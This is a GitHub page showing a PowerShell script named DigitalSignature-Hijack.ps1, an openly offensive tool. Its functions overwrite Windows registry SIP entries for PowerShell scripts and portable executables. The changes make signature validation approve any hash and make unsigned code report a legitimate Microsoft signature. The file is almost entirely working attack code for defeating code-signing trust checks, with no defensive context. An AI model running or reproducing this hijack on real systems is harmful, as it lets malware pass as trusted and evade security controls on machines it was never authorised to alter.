-
Notifications
You must be signed in to change notification settings - Fork 71
/
Copy pathDigitalSignature-Hijack.ps1
76 lines (51 loc) · 2.28 KB
/
DigitalSignature-Hijack.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
<#
DigitalSignatureHijack v1.0
License: GPLv3
Author: @netbiosX
#>
# Validate Digital Signature for PowerShell Scripts
function ValidateSignaturePS
{
$ValidateHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
# PowerShell SIP Guid
$PSIPGuid = '{603BCC1F-4B59-4E08-B724-D2C6297EF351}'
$PSSignatureValidation = Get-Item -Path "$ValidateHashFunc\$PSIPGuid\"
$NewDll = 'C:\Users\User\Desktop\Signature Signing\Binaries\MySIP.dll'
$NewFuncName = 'AutoApproveHash'
$PSSignatureValidation | Set-ItemProperty -Name Dll -Value $NewDll
$PSSignatureValidation | Set-ItemProperty -Name FuncName -Value $NewFuncName
}
# Validate Digital Signature for Portable Executables
function ValidateSignaturePE
{
$ValidateHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
# PE SIP Guid
$PESIPGuid = '{C689AAB8-8E78-11D0-8C47-00C04FC295EE}'
$PESignatureValidation = Get-Item -Path "$ValidateHashFunc\$PESIPGuid\"
$NewDll = 'C:\Windows\System32\ntdll.dll'
$NewFuncName = 'DbgUiContinue'
$PESignatureValidation | Set-ItemProperty -Name Dll -Value $NewDll
$PESignatureValidation | Set-ItemProperty -Name FuncName -Value $NewFuncName
}
function SignPS
{
$GetCertFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg'
# PowerShell SIP Guid
$PSIPGuid = '{603BCC1F-4B59-4E08-B724-D2C6297EF351}'
$PEGetMSCert = Get-Item -Path "$GetCertFunc\$PSIPGuid\"
$NewDll = 'C:\Users\User\Desktop\Signature Signing\Binaries\MySIP.dll'
$NewFuncName = 'GetLegitMSSignature'
$PEGetMSCert | Set-ItemProperty -Name Dll -Value $NewDll
$PEGetMSCert | Set-ItemProperty -Name FuncName -Value $NewFuncName
}
function SignExe
{
$GetCertFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg'
# PE SIP Guid
$PESIPGuid = '{C689AAB8-8E78-11D0-8C47-00C04FC295EE}'
$PEGetMSCert = Get-Item -Path "$GetCertFunc\$PESIPGuid\"
$NewDll = 'C:\Users\User\Desktop\Signature Signing\Binaries\MySIP.dll'
$NewFuncName = 'GetLegitMSSignature'
$PEGetMSCert | Set-ItemProperty -Name Dll -Value $NewDll
$PEGetMSCert | Set-ItemProperty -Name FuncName -Value $NewFuncName
}